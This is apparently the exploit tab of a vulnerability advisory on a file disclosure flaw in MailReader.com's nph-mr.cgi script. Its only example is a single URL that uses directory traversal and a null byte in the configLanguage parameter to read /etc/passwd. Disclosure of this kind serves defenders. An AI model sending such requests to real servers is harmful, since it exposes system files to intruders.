• info
• discussion
• exploit
• solution
• references

MailReader.com NPH-MR.CGI File Disclosure Vulnerability

This issue may be exploited with a web browser. The following example was provided:

http://www.example.com/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00